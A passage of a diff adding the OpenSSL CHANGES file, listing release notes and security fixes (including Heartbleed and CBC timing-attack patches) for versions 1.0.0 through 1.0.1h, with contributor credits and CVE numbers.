+     Thanks to Jüri Aedla for reporting this issue. (CVE-2014-0195)
+     [Jüri Aedla, Steve Henson]
+
+  *) Fix bug in TLS code where clients enable anonymous ECDH ciphersuites
+     are subject to a denial of service attack.
+
+     Thanks to Felix Gröbert and Ivan Fratric at Google for discovering
+     this issue. (CVE-2014-3470)
+     [Felix Gröbert, Ivan Fratric, Steve Henson]
+
+  *) Harmonize version and its documentation. -f flag is used to display
+     compilation flags.
+     [mancha <mancha1@zoho.com>]
+
+  *) Fix eckey_priv_encode so it immediately returns an error upon a failure
+     in i2d_ECPrivateKey.
+     [mancha <mancha1@zoho.com>]
+
+  *) Fix some double frees. These are not thought to be exploitable.
+     [mancha <mancha1@zoho.com>]
+
+ Changes between 1.0.1f and 1.0.1g [7 Apr 2014]
+
+  *) A missing bounds check in the handling of the TLS heartbeat extension
+     can be used to reveal up to 64k of memory to a connected client or
+     server.
+
+     Thanks for Neel Mehta of Google Security for discovering this bug and to
+     Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for
+     preparing the fix (CVE-2014-0160)
+     [Adam Langley, Bodo Moeller]
+
+  *) Fix for the attack described in the paper "Recovering OpenSSL
+     ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack"
+     by Yuval Yarom and Naomi Benger. Details can be obtained from:
+     http://eprint.iacr.org/2014/140
+
+     Thanks to Yuval Yarom and Naomi Benger for discovering this
+     flaw and to Yuval Yarom for supplying a fix (CVE-2014-0076)
+     [Yuval Yarom and Naomi Benger]
+
+  *) TLS pad extension: draft-agl-tls-padding-03
+
+     Workaround for the "TLS hang bug" (see FAQ and PR#2771): if the
+     TLS client Hello record length value would otherwise be > 255 and
+     less that 512 pad with a dummy extension containing zeroes so it
+     is at least 512 bytes long.
+
+     [Adam Langley, Steve Henson]
+
+ Changes between 1.0.1e and 1.0.1f [6 Jan 2014]
+
+  *) Fix for TLS record tampering bug. A carefully crafted invalid 
+     handshake could crash OpenSSL with a NULL pointer exception.
+     Thanks to Anton Johansson for reporting this issues.
+     (CVE-2013-4353)
+
+  *) Keep original DTLS digest and encryption contexts in retransmission
+     structures so we can use the previous session parameters if they need
+     to be resent. (CVE-2013-6450)
+     [Steve Henson]
+
+  *) Add option SSL_OP_SAFARI_ECDHE_ECDSA_BUG (part of SSL_OP_ALL) which
+     avoids preferring ECDHE-ECDSA ciphers when the client appears to be
+     Safari on OS X.  Safari on OS X 10.8..10.8.3 advertises support for
+     several ECDHE-ECDSA ciphers, but fails to negotiate them.  The bug
+     is fixed in OS X 10.8.4, but Apple have ruled out both hot fixing
+     10.8..10.8.3 and forcing users to upgrade to 10.8.4 or newer.
+     [Rob Stradling, Adam Langley]
+
+ Changes between 1.0.1d and 1.0.1e [11 Feb 2013]
+
+  *) Correct fix for CVE-2013-0169. The original didn't work on AES-NI
+     supporting platforms or when small records were transferred.
+     [Andy Polyakov, Steve Henson]
+
+ Changes between 1.0.1c and 1.0.1d [5 Feb 2013]
+
+  *) Make the decoding of SSLv3, TLS and DTLS CBC records constant time.
+
+     This addresses the flaw in CBC record processing discovered by 
+     Nadhem Alfardan and Kenny Paterson. Details of this attack can be found
+     at: http://www.isg.rhul.ac.uk/tls/     
+
+     Thanks go to Nadhem Alfardan and Kenny Paterson of the Information
+     Security Group at Royal Holloway, University of London
+     (www.isg.rhul.ac.uk) for discovering this flaw and Adam Langley and
+     Emilia Käsper for the initial patch.
+     (CVE-2013-0169)
+     [Emilia Käsper, Adam Langley, Ben Laurie, Andy Polyakov, Steve Henson]
+
+  *) Fix flaw in AESNI handling of TLS 1.2 and 1.1 records for CBC mode
+     ciphersuites which can be exploited in a denial of service attack.
+     Thanks go to and to Adam Langley <agl@chromium.org> for discovering
+     and detecting this bug and to Wolfgang Ettlinger
+     <wolfgang.ettlinger@gmail.com> for independently discovering this issue.
+     (CVE-2012-2686)
+     [Adam Langley]
+
+  *) Return an error when checking OCSP signatures when key is NULL.
+     This fixes a DoS attack. (CVE-2013-0166)
+     [Steve Henson]
+
+  *) Make openssl verify return errors.
+     [Chris Palmer <palmer@google.com> and Ben Laurie]
+
+  *) Call OCSP Stapling callback after ciphersuite has been chosen, so
+     the right response is stapled. Also change SSL_get_certificate()
+     so it returns the certificate actually sent.
+     See http://rt.openssl.org/Ticket/Display.html?id=2836.
+     [Rob Stradling <rob.stradling@comodo.com>]
+
+  *) Fix possible deadlock when decoding public keys.
+     [Steve Henson]
+
+  *) Don't use TLS 1.0 record version number in initial client hello
+     if renegotiating.
+     [Steve Henson]
+
+ Changes between 1.0.1b and 1.0.1c [10 May 2012]
+
+  *) Sanity check record length before skipping explicit IV in TLS
+     1.2, 1.1 and DTLS to fix DoS attack.
+
+     Thanks to Codenomicon for discovering this issue using Fuzz-o-Matic
+     fuzzing as a service testing platform.
+     (CVE-2012-2333)
+     [Steve Henson]
+
+  *) Initialise tkeylen properly when encrypting CMS messages.
+     Thanks to Solar Designer of Openwall for reporting this issue.
+     [Steve Henson]
+
+  *) In FIPS mode don't try to use composite ciphers as they are not
+     approved.
+     [Steve Henson]
+
+ Changes between 1.0.1a and 1.0.1b [26 Apr 2012]
+
+  *) OpenSSL 1.0.0 sets SSL_OP_ALL to 0x80000FFFL and OpenSSL 1.0.1 and
+     1.0.1a set SSL_OP_NO_TLSv1_1 to 0x00000400L which would unfortunately
+     mean any application compiled against OpenSSL 1.0.0 headers setting
+     SSL_OP_ALL would also set SSL_OP_NO_TLSv1_1, unintentionally disablng
+     TLS 1.1 also. Fix this by changing the value of SSL_OP_NO_TLSv1_1 to
+     0x10000000L Any application which was previously compiled against
+     OpenSSL 1.0.1 or 1.0.1a headers and which cares about SSL_OP_NO_TLSv1_1
+     will need to be recompiled as a result. Letting be results in
+     inability to disable specifically TLS 1.1 and in client context,
+     in unlike event, limit maximum offered version to TLS 1.0 [see below].
+     [Steve Henson]
+
+  *) In order to ensure interoperabilty SSL_OP_NO_protocolX does not
+     disable just protocol X, but all protocols above X *if* there are
+     protocols *below* X still enabled. In more practical terms it means
+     that if application wants to disable TLS1.0 in favor of TLS1.1 and
+     above, it's not sufficient to pass SSL_OP_NO_TLSv1, one has to pass
+     SSL_OP_NO_TLSv1|SSL_OP_NO_SSLv3|SSL_OP_NO_SSLv2. This applies to
+     client side.
+     [Andy Polyakov]
+
+ Changes between 1.0.1 and 1.0.1a [19 Apr 2012]
+
+  *) Check for potentially exploitable overflows in asn1_d2i_read_bio
+     BUF_mem_grow and BUF_mem_grow_clean. Refuse attempts to shrink buffer
+     in CRYPTO_realloc_clean.
+
+     Thanks to Tavis Ormandy, Google Security Team, for discovering this
+     issue and to Adam Langley <agl@chromium.org> for fixing it.
+     (CVE-2012-2110)
+     [Adam Langley (Google), Tavis Ormandy, Google Security Team]
+
+  *) Don't allow TLS 1.2 SHA-256 ciphersuites in TLS 1.0, 1.1 connections.
+     [Adam Langley]
+
+  *) Workarounds for some broken servers that "hang" if a client hello
+     record length exceeds 255 bytes.
+
+     1. Do not use record version number > TLS 1.0 in initial client
+        hello: some (but not all) hanging servers will now work.
+     2. If we set OPENSSL_MAX_TLS1_2_CIPHER_LENGTH this will truncate
+	the number of ciphers sent in the client hello. This should be
+        set to an even number, such as 50, for example by passing:
+        -DOPENSSL_MAX_TLS1_2_CIPHER_LENGTH=50 to config or Configure.
+        Most broken servers should now work.
+     3. If all else fails setting OPENSSL_NO_TLS1_2_CLIENT will disable
+	TLS 1.2 client support entirely.
+     [Steve Henson]
+
+  *) Fix SEGV in Vector Permutation AES module observed in OpenSSH.
+     [Andy Polyakov]
+
+ Changes between 1.0.0h and 1.0.1  [14 Mar 2012]
+
+  *) Add compatibility with old MDC2 signatures which use an ASN1 OCTET
+     STRING form instead of a DigestInfo.
+     [Steve Henson]
+
+  *) The format used for MDC2 RSA signatures is inconsistent between EVP
+     and the RSA_sign/RSA_verify functions. This was made more apparent when
+     OpenSSL used RSA_sign/RSA_verify for some RSA signatures in particular
+     those which went through EVP_PKEY_METHOD in 1.0.0 and later. Detect 
+     the correct format in RSA_verify so both forms transparently work.
+     [Steve Henson]
+
+  *) Some servers which support TLS 1.0 can choke if we initially indicate
+     support for TLS 1.2 and later renegotiate using TLS 1.0 in the RSA
+     encrypted premaster secret. As a workaround use the maximum pemitted
+     client version in client hello, this should keep such servers happy
+     and still work with previous versions of OpenSSL.
+     [Steve Henson]
+
+  *) Add support for TLS/DTLS heartbeats.
+     [Robin Seggelmann <seggelmann@fh-muenster.de>]
+
+  *) Add support for SCTP.
+     [Robin Seggelmann <seggelmann@fh-muenster.de>]
+
+  *) Improved PRNG seeding for VOS.
+     [Paul Green <Paul.Green@stratus.com>]
+
+  *) Extensive assembler packs updates, most notably:
+
+	- x86[_64]:     AES-NI, PCLMULQDQ, RDRAND support;
+	- x86[_64]:     SSSE3 support (SHA1, vector-permutation AES);
+	- x86_64:       bit-sliced AES implementation;
+	- ARM:          NEON support, contemporary platforms optimizations;
+	- s390x:        z196 support;
+	- *:            GHASH and GF(2^m) multiplication implementations;
+
+     [Andy Polyakov]
+
+  *) Make TLS-SRP code conformant with RFC 5054 API cleanup
+     (removal of unnecessary code)
+     [Peter Sylvester <peter.sylvester@edelweb.fr>]
+
+  *) Add TLS key material exporter from RFC 5705.
+     [Eric Rescorla]
+
+  *) Add DTLS-SRTP negotiation from RFC 5764.
+     [Eric Rescorla]
+
+  *) Add Next Protocol Negotiation,
+     http://tools.ietf.org/html/draft-agl-tls-nextprotoneg-00. Can be
+     disabled with a no-npn flag to config or Configure. Code donated
+     by Google.
+     [Adam Langley <agl@google.com> and Ben Laurie]
+
+  *) Add optional 64-bit optimized implementations of elliptic curves NIST-P224,
+     NIST-P256, NIST-P521, with constant-time single point multiplication on
+     typical inputs. Compiler support for the nonstandard type __uint128_t is
+     required to use this (present in gcc 4.4 and later, for 64-bit builds).
+     Code made available under Apache License version 2.0.
+
+     Specify "enable-ec_nistp_64_gcc_128" on the Configure (or config) command
+     line to include this in your build of OpenSSL, and run "make depend" (or
+     "make update"). This enables the following EC_METHODs:
+
+         EC_GFp_nistp224_method()
+         EC_GFp_nistp256_method()
+         EC_GFp_nistp521_method()
+
+     EC_GROUP_new_by_curve_name() will automatically use these (while
+     EC_GROUP_new_curve_GFp() currently prefers the more flexible
+     implementations).
+     [Emilia Käsper, Adam Langley, Bodo Moeller (Google)]
+
+  *) Use type ossl_ssize_t instad of ssize_t which isn't available on
+     all platforms. Move ssize_t definition from e_os.h to the public
+     header file e_os2.h as it now appears in public header file cms.h
+     [Steve Henson]
+
+  *) New -sigopt option to the ca, req and x509 utilities. Additional
+     signature parameters can be passed using this option and in
+     particular PSS. 
+     [Steve Henson]
+
+  *) Add RSA PSS signing function. This will generate and set the
+     appropriate AlgorithmIdentifiers for PSS based on those in the
+     corresponding EVP_MD_CTX structure. No application support yet.
+     [Steve Henson]
+
+  *) Support for companion algorithm specific ASN1 signing routines.
+     New function ASN1_item_sign_ctx() signs a pre-initialised
+     EVP_MD_CTX structure and sets AlgorithmIdentifiers based on
+     the appropriate parameters.
+     [Steve Henson]
+
+  *) Add new algorithm specific ASN1 verification initialisation function
+     to EVP_PKEY_ASN1_METHOD: this is not in EVP_PKEY_METHOD since the ASN1
+     handling will be the same no matter what EVP_PKEY_METHOD is used.
+     Add a PSS handler to support verification of PSS signatures: checked
+     against a number of sample certificates.
+     [Steve Henson]
+
+  *) Add signature printing for PSS. Add PSS OIDs.
+     [Steve Henson, Martin Kaiser <lists@kaiser.cx>]
+
+  *) Add algorithm specific signature printing. An individual ASN1 method
+     can now print out signatures instead of the standard hex dump. 
+
+     More complex signatures (e.g. PSS) can print out more meaningful
+     information. Include DSA version that prints out the signature
+     parameters r, s.
+     [Steve Henson]
+
+  *) Password based recipient info support for CMS library: implementing
+     RFC3211.
+     [Steve Henson]
+
+  *) Split password based encryption into PBES2 and PBKDF2 functions. This
+     neatly separates the code into cipher and PBE sections and is required
+     for some algorithms that split PBES2 into separate pieces (such as
+     password based CMS).
+     [Steve Henson]
+
+  *) Session-handling fixes:
+     - Fix handling of connections that are resuming with a session ID,
+       but also support Session Tickets.
+     - Fix a bug that suppressed issuing of a new ticket if the client
+       presented a ticket with an expired session.
+     - Try to set the ticket lifetime hint to something reasonable.
+     - Make tickets shorter by excluding irrelevant information.
+     - On the client side, don't ignore renewed tickets.
+     [Adam Langley, Bodo Moeller (Google)]
+
+  *) Fix PSK session representation.
+     [Bodo Moeller]
+
+  *) Add RC4-MD5 and AESNI-SHA1 "stitched" implementations.
+
+     This work was sponsored by Intel.
+     [Andy Polyakov]
+
+  *) Add GCM support to TLS library. Some custom code is needed to split
+     the IV between the fixed (from PRF) and explicit (from TLS record)
+     portions. This adds all GCM ciphersuites supported by RFC5288 and 
+     RFC5289. Generalise some AES* cipherstrings to inlclude GCM and
+     add a special AESGCM string for GCM only.
+     [Steve Henson]
+
+  *) Expand range of ctrls for AES GCM. Permit setting invocation
+     field on decrypt and retrieval of invocation field only on encrypt.
+     [Steve Henson]
+
+  *) Add HMAC ECC ciphersuites from RFC5289. Include SHA384 PRF support.
+     As required by RFC5289 these ciphersuites cannot be used if for
+     versions of TLS earlier than 1.2.
+     [Steve Henson]
+
+  *) For FIPS capable OpenSSL interpret a NULL default public key method
+     as unset and return the appopriate default but do *not* set the default.
+     This means we can return the appopriate method in applications that
+     swicth between FIPS and non-FIPS modes.
+     [Steve Henson]
+
+  *) Redirect HMAC and CMAC operations to FIPS module in FIPS mode. If an
+     ENGINE is used then we cannot handle that in the FIPS module so we
+     keep original code iff non-FIPS operations are allowed.
+     [Steve Henson]
+
+  *) Add -attime option to openssl utilities.
+     [Peter Eckersley <pde@eff.org>, Ben Laurie and Steve Henson]
+
+  *) Redirect DSA and DH operations to FIPS module in FIPS mode.
+     [Steve Henson]
+
+  *) Redirect ECDSA and ECDH operations to FIPS module in FIPS mode. Also use
+     FIPS EC methods unconditionally for now.
+     [Steve Henson]
+
+  *) New build option no-ec2m to disable characteristic 2 code.
+     [Steve Henson]
+
+  *) Backport libcrypto audit of return value checking from 1.1.0-dev; not
+     all cases can be covered as some introduce binary incompatibilities.
+     [Steve Henson]
+
+  *) Redirect RSA operations to FIPS module including keygen,
+     encrypt, decrypt, sign and verify. Block use of non FIPS RSA methods.
+     [Steve Henson]
+
+  *) Add similar low level API blocking to ciphers.
+     [Steve Henson]
+
+  *) Low level digest APIs are not approved in FIPS mode: any attempt
+     to use these will cause a fatal error. Applications that *really* want
+     to use them can use the private_* version instead.
+     [Steve Henson]
+
+  *) Redirect cipher operations to FIPS module for FIPS builds. 
+     [Steve Henson]
+
+  *) Redirect digest operations to FIPS module for FIPS builds. 
+     [Steve Henson]
+
+  *) Update build system to add "fips" flag which will link in fipscanister.o
+     for static and shared library builds embedding a signature if needed.
+     [Steve Henson]
+
+  *) Output TLS supported curves in preference order instead of numerical
+     order. This is currently hardcoded for the highest order curves first.
+     This should be configurable so applications can judge speed vs strength.
+     [Steve Henson]
+
+  *) Add TLS v1.2 server support for client authentication. 
+     [Steve Henson]
+
+  *) Add support for FIPS mode in ssl library: disable SSLv3, non-FIPS ciphers
+     and enable MD5.
+     [Steve Henson]
+
+  *) Functions FIPS_mode_set() and FIPS_mode() which call the underlying
+     FIPS modules versions.
+     [Steve Henson]
+
+  *) Add TLS v1.2 client side support for client authentication. Keep cache
+     of handshake records longer as we don't know the hash algorithm to use
+     until after the certificate request message is received.
+     [Steve Henson]
+
+  *) Initial TLS v1.2 client support. Add a default signature algorithms
+     extension including all the algorithms we support. Parse new signature
+     format in client key exchange. Relax some ECC signing restrictions for
+     TLS v1.2 as indicated in RFC5246.
+     [Steve Henson]
+
+  *) Add server support for TLS v1.2 signature algorithms extension. Switch
+     to new signature format when needed using client digest preference.
+     All server ciphersuites should now work correctly in TLS v1.2. No client
+     support yet and no support for client certificates.
+     [Steve Henson]
+
+  *) Initial TLS v1.2 support. Add new SHA256 digest to ssl code, switch
+     to SHA256 for PRF when using TLS v1.2 and later. Add new SHA256 based
+     ciphersuites. At present only RSA key exchange ciphersuites work with
+     TLS v1.2. Add new option for TLS v1.2 replacing the old and obsolete
+     SSL_OP_PKCS1_CHECK flags with SSL_OP_NO_TLSv1_2. New TLSv1.2 methods
+     and version checking.
+     [Steve Henson]
+
+  *) New option OPENSSL_NO_SSL_INTERN. If an application can be compiled
+     with this defined it will not be affected by any changes to ssl internal
+     structures. Add several utility functions to allow openssl application
+     to work with OPENSSL_NO_SSL_INTERN defined.
+     [Steve Henson]
+
+  *) Add SRP support.
+     [Tom Wu <tjw@cs.stanford.edu> and Ben Laurie]
+
+  *) Add functions to copy EVP_PKEY_METHOD and retrieve flags and id.
+     [Steve Henson]
+
+  *) Permit abbreviated handshakes when renegotiating using the function
+     SSL_renegotiate_abbreviated().
+     [Robin Seggelmann <seggelmann@fh-muenster.de>]
+
+  *) Add call to ENGINE_register_all_complete() to
+     ENGINE_load_builtin_engines(), so some implementations get used
+     automatically instead of needing explicit application support.
+     [Steve Henson]
+
+  *) Add support for TLS key exporter as described in RFC5705.
+     [Robin Seggelmann <seggelmann@fh-muenster.de>, Steve Henson]
+
+  *) Initial TLSv1.1 support. Since TLSv1.1 is very similar to TLS v1.0 only
+     a few changes are required:
+
+       Add SSL_OP_NO_TLSv1_1 flag.
+       Add TLSv1_1 methods.
+       Update version checking logic to handle version 1.1.
+       Add explicit IV handling (ported from DTLS code).
+       Add command line options to s_client/s_server.
+     [Steve Henson]
+
+ Changes between 1.0.0j and 1.0.0k [5 Feb 2013]
+
+  *) Make the decoding of SSLv3, TLS and DTLS CBC records constant time.
+
+     This addresses the flaw in CBC record processing discovered by 
+     Nadhem Alfardan and Kenny Paterson. Details of this attack can be found
+     at: http://www.isg.rhul.ac.uk/tls/     
+
+     Thanks go to Nadhem Alfardan and Kenny Paterson of the Information
+     Security Group at Royal Holloway, University of London
+     (www.isg.rhul.ac.uk) for discovering this flaw and Adam Langley and
+     Emilia Käsper for the initial patch.
+     (CVE-2013-0169)
+     [Emilia Käsper, Adam Langley, Ben Laurie, Andy Polyakov, Steve Henson]
+
+  *) Return an error when checking OCSP signatures when key is NULL.
+     This fixes a DoS attack. (CVE-2013-0166)
+     [Steve Henson]
+
+  *) Call OCSP Stapling callback after ciphersuite has been chosen, so
+     the right response is stapled. Also change SSL_get_certificate()
+     so it returns the certificate actually sent.
+     See http://rt.openssl.org/Ticket/Display.html?id=2836.
+     (This is a backport)
+     [Rob Stradling <rob.stradling@comodo.com>]
+
+  *) Fix possible deadlock when decoding public keys.
+     [Steve Henson]
+
+ Changes between 1.0.0i and 1.0.0j [10 May 2012]
+
+  [NB: OpenSSL 1.0.0i and later 1.0.0 patch levels were released after
+  OpenSSL 1.0.1.]
+
+  *) Sanity check record length before skipping explicit IV in DTLS
+     to fix DoS attack.
+
+     Thanks to Codenomicon for discovering this issue using Fuzz-o-Matic
+     fuzzing as a service testing platform.
+     (CVE-2012-2333)
+     [Steve Henson]
+
+  *) Initialise tkeylen properly when encrypting CMS messages.
+     Thanks to Solar Designer of Openwall for reporting this issue.
+     [Steve Henson]
+
+ Changes between 1.0.0h and 1.0.0i [19 Apr 2012]
+
+  *) Check for potentially exploitable overflows in asn1_d2i_read_bio
+     BUF_mem_grow and BUF_mem_grow_clean. Refuse attempts to shrink buffer
+     in CRYPTO_realloc_clean.
+
+     Thanks to Tavis Ormandy, Google Security Team, for discovering this
+     issue and to Adam Langley <agl@chromium.org> for fixing it.
+     (CVE-2012-2110)
+     [Adam Langley (Google), Tavis Ormandy, Google Security Team]
+
+ Changes between 1.0.0g and 1.0.0h [12 Mar 2012]
+
+  *) Fix MMA (Bleichenbacher's attack on PKCS #1 v1.5 RSA padding) weakness
+     in CMS and PKCS7 code. When RSA decryption fails use a random key for
+     content decryption and always return the same error. Note: this attack
+     needs on average 2^20 messages so it only affects automated senders. The
+     old behaviour can be reenabled in the CMS code by setting the
+     CMS_DEBUG_DECRYPT flag: this is useful for debugging and testing where
+     an MMA defence is not necessary.
+     Thanks to Ivan Nestlerode <inestlerode@us.ibm.com> for discovering
+     this issue. (CVE-2012-0884)
+     [Steve Henson]
+
+  *) Fix CVE-2011-4619: make sure we really are receiving a 
+     client hello before rejecting multiple SGC restarts. Thanks to
+     Ivan Nestlerode <inestlerode@us.ibm.com> for discovering this bug.
+     [Steve Henson]
+
+ Changes between 1.0.0f and 1.0.0g [18 Jan 2012]
+
+  *) Fix for DTLS DoS issue introduced by fix for CVE-2011-4109.
+     Thanks to Antonio Martin, Enterprise Secure Access Research and
+     Development, Cisco Systems, Inc. for discovering this bug and
+     preparing a fix. (CVE-2012-0050)
+     [Antonio Martin]
+
+ Changes between 1.0.0e and 1.0.0f [4 Jan 2012]
+
+  *) Nadhem Alfardan and Kenny Paterson have discovered an extension
+     of the Vaudenay padding oracle attack on CBC mode encryption
+     which enables an efficient plaintext recovery attack against
+     the OpenSSL implementation of DTLS. Their attack exploits timing
+     differences arising during decryption processing. A research
+     paper describing this attack can be found at:
+                  http://www.isg.rhul.ac.uk/~kp/dtls.pdf
+     Thanks go to Nadhem Alfardan and Kenny Paterson of the Information
+     Security Group at Royal Holloway, University of London
+     (www.isg.rhul.ac.uk) for discovering this flaw and to Robin Seggelmann
+     <seggelmann@fh-muenster.de> and Michael Tuexen <tuexen@fh-muenster.de>
+     for preparing the fix. (CVE-2011-4108)
+     [Robin Seggelmann, Michael Tuexen]
+
+  *) Clear bytes used for block padding of SSL 3.0 records.
+     (CVE-2011-4576)
+     [Adam Langley (Google)]
+
+  *) Only allow one SGC handshake restart for SSL/TLS. Thanks to George
+     Kadianakis <desnacked@gmail.com> for discovering this issue and
+     Adam Langley for preparing the fix. (CVE-2011-4619)
+     [Adam Langley (Google)]
+
+  *) Check parameters are not NULL in GOST ENGINE. (CVE-2012-0027)
+     [Andrey Kulikov <amdeich@gmail.com>]
+
+  *) Prevent malformed RFC3779 data triggering an assertion failure.
+     Thanks to Andrew Chi, BBN Technologies, for discovering the flaw
+     and Rob Austein <sra@hactrn.net> for fixing it. (CVE-2011-4577)
+     [Rob Austein <sra@hactrn.net>]
+
+  *) Improved PRNG seeding for VOS.
+     [Paul Green <Paul.Green@stratus.com>]
+
+  *) Fix ssl_ciph.c set-up race.
+     [Adam Langley (Google)]
+
+  *) Fix spurious failures in ecdsatest.c.
+     [Emilia Käsper (Google)]
+
+  *) Fix the BIO_f_buffer() implementation (which was mixing different
+     interpretations of the '..._len' fields).
+     [Adam Langley (Google)]
+
+  *) Fix handling of BN_BLINDING: now BN_BLINDING_invert_ex (rather than
+     BN_BLINDING_invert_ex) calls BN_BLINDING_update, ensuring that concurrent
+     threads won't reuse the same blinding coefficients.
+
+     This also avoids the need to obtain the CRYPTO_LOCK_RSA_BLINDING
+     lock to call BN_BLINDING_invert_ex, and avoids one use of
+     BN_BLINDING_update for each BN_BLINDING structure (previously,
+     the last update always remained unused).
+     [Emilia Käsper (Google)]
+
+  *) In ssl3_clear, preserve s3->init_extra along with s3->rbuf.
+     [Bob Buckholz (Google)]
+
+ Changes between 1.0.0d and 1.0.0e [6 Sep 2011]
+
+  *) Fix bug where CRLs with nextUpdate in the past are sometimes accepted
+     by initialising X509_STORE_CTX properly. (CVE-2011-3207)
+     [Kaspar Brand <ossl@velox.ch>]
+
+  *) Fix SSL memory handling for (EC)DH ciphersuites, in particular
+     for multi-threaded use of ECDH. (CVE-2011-3210)
+     [Adam Langley (Google)]
+
+  *) Fix x509_name_ex_d2i memory leak on bad inputs.
+     [Bodo Moeller]
+
+  *) Remove hard coded ecdsaWithSHA1 signature tests in ssl code and check
+     signature public key algorithm by using OID xref utilities instead.
+     Before this you could only use some ECC ciphersuites with SHA1 only.
+     [Steve Henson]
+
+  *) Add protection against ECDSA timing attacks as mentioned in the paper
+     by Billy Bob Brumley and Nicola Tuveri, see:
+
+	http://eprint.iacr.org/2011/232.pdf
+
+     [Billy Bob Brumley and Nicola Tuveri]
+
+ Changes between 1.0.0c and 1.0.0d [8 Feb 2011]
+
+  *) Fix parsing of OCSP stapling ClientHello extension. CVE-2011-0014
+     [Neel Mehta, Adam Langley, Bodo Moeller (Google)]
+
+  *) Fix bug in string printing code: if *any* escaping is enabled we must
+     escape the escape character (backslash) or the resulting string is
+     ambiguous.
+     [Steve Henson]
+
+ Changes between 1.0.0b and 1.0.0c  [2 Dec 2010]
+
+  *) Disable code workaround for ancient and obsolete Netscape browsers
+     and servers: an attacker can use it in a ciphersuite downgrade attack.
+     Thanks to Martin Rex for discovering this bug. CVE-2010-4180
+     [Steve Henson]
+
+  *) Fixed J-PAKE implementation error, originally discovered by
+     Sebastien Martini, further info and confirmation from Stefan
+     Arentz and Feng Hao. Note that this fix is a security fix. CVE-2010-4252
+     [Ben Laurie]
+
+ Changes between 1.0.0a and 1.0.0b  [16 Nov 2010]
+
+  *) Fix extension code to avoid race conditions which can result in a buffer
+     overrun vulnerability: resumed sessions must not be modified as they can
+     be shared by multiple threads. CVE-2010-3864
+     [Steve Henson]
+
+  *) Fix WIN32 build system to correctly link an ENGINE directory into
+     a DLL. 
+     [Steve Henson]
+
+ Changes between 1.0.0 and 1.0.0a  [01 Jun 2010]
+
+  *) Check return value of int_rsa_verify in pkey_rsa_verifyrecover 
+     (CVE-2010-1633)
+     [Steve Henson, Peter-Michael Hager <hager@dortmund.net>]
+
+ Changes between 0.9.8n and 1.0.0  [29 Mar 2010]
+
+  *) Add "missing" function EVP_CIPHER_CTX_copy(). This copies a cipher
+     context. The operation can be customised via the ctrl mechanism in
+     case ENGINEs want to include additional functionality.
+     [Steve Henson]
+
+  *) Tolerate yet another broken PKCS#8 key format: private key value negative.
+     [Steve Henson]
+
+  *) Add new -subject_hash_old and -issuer_hash_old options to x509 utility to
+     output hashes compatible with older versions of OpenSSL.
+     [Willy Weisz <weisz@vcpc.univie.ac.at>]
+
+  *) Fix compression algorithm handling: if resuming a session use the
+     compression algorithm of the resumed session instead of determining
+     it from client hello again. Don't allow server to change algorithm.
+     [Steve Henson]
+
+  *) Add load_crls() function to apps tidying load_certs() too. Add option
+     to verify utility to allow additional CRLs to be included.
+     [Steve Henson]
+
+  *) Update OCSP request code to permit adding custom headers to the request:
+     some responders need this.
+     [Steve Henson]
+
+  *) The function EVP_PKEY_sign() returns <=0 on error: check return code
+     correctly.
+     [Julia Lawall <julia@diku.dk>]
+
+  *) Update verify callback code in apps/s_cb.c and apps/verify.c, it
+     needlessly dereferenced structures, used obsolete functions and
+     didn't handle all updated verify codes correctly.
+     [Steve Henson]
+
+  *) Disable MD2 in the default configuration.
+     [Steve Henson]
+
+  *) In BIO_pop() and BIO_push() use the ctrl argument (which was NULL) to
+     indicate the initial BIO being pushed or popped. This makes it possible
+     to determine whether the BIO is the one explicitly called or as a result
+     of the ctrl being passed down the chain. Fix BIO_pop() and SSL BIOs so
+     it handles reference counts correctly and doesn't zero out the I/O bio
+     when it is not being explicitly popped. WARNING: applications which
+     included workarounds for the old buggy behaviour will need to be modified
+     or they could free up already freed BIOs.
+     [Steve Henson]
+
+  *) Extend the uni2asc/asc2uni => OPENSSL_uni2asc/OPENSSL_asc2uni
+     renaming to all platforms (within the 0.9.8 branch, this was
+     done conditionally on Netware platforms to avoid a name clash).
+     [Guenter <lists@gknw.net>]
+
+  *) Add ECDHE and PSK support to DTLS.
+     [Michael Tuexen <tuexen@fh-muenster.de>]
+
+  *) Add CHECKED_STACK_OF macro to safestack.h, otherwise safestack can't
+     be used on C++.
+     [Steve Henson]
+
+  *) Add "missing" function EVP_MD_flags() (without this the only way to
+     retrieve a digest flags is by accessing the structure directly. Update
+     EVP_MD_do_all*() and EVP_CIPHER_do_all*() to include the name a digest
+     or cipher is registered as in the "from" argument. Print out all
+     registered digests in the dgst usage message instead of manually 
+     attempting to work them out.
+     [Steve Henson]
+
+  *) If no SSLv2 ciphers are used don't use an SSLv2 compatible client hello:
+     this allows the use of compression and extensions. Change default cipher
+     string to remove SSLv2 ciphersuites. This effectively avoids ancient SSLv2
+     by default unless an application cipher string requests it.
+     [Steve Henson]
+
+  *) Alter match criteria in PKCS12_parse(). It used to try to use local
+     key ids to find matching certificates and keys but some PKCS#12 files
+     don't follow the (somewhat unwritten) rules and this strategy fails.
+     Now just gather all certificates together and the first private key
+     then look for the first certificate that matches the key.
+     [Steve Henson]
+
+  *) Support use of registered digest and cipher names for dgst and cipher
+     commands instead of having to add each one as a special case. So now
+     you can do:
+
+        openssl sha256 foo
+
+     as well as:
+
+        openssl dgst -sha256 foo
+
+     and this works for ENGINE based algorithms too.
+
+     [Steve Henson]
+
+  *) Update Gost ENGINE to support parameter files.
+     [Victor B. Wagner <vitus@cryptocom.ru>]
+
+  *) Support GeneralizedTime in ca utility. 
+     [Oliver Martin <oliver@volatilevoid.net>, Steve Henson]
+
+  *) Enhance the hash format used for certificate directory links. The new
+     form uses the canonical encoding (meaning equivalent names will work
+     even if they aren't identical) and uses SHA1 instead of MD5. This form
+     is incompatible with the older format and as a result c_rehash should
+     be used to rebuild symbolic links.
+     [Steve Henson]
+
+  *) Make PKCS#8 the default write format for private keys, replacing the
+     traditional format. This form is standardised, more secure and doesn't
+     include an implicit MD5 dependency.
+     [Steve Henson]
+
+  *) Add a $gcc_devteam_warn option to Configure. The idea is that any code
+     committed to OpenSSL should pass this lot as a minimum.
+     [Steve Henson]
+
+  *) Add session ticket override functionality for use by EAP-FAST.
+     [Jouni Malinen <j@w1.fi>]
+
+  *) Modify HMAC functions to return a value. Since these can be implemented
+     in an ENGINE errors can occur.
+     [Steve Henson]
+
+  *) Type-checked OBJ_bsearch_ex.
+     [Ben Laurie]
+
+  *) Type-checked OBJ_bsearch. Also some constification necessitated
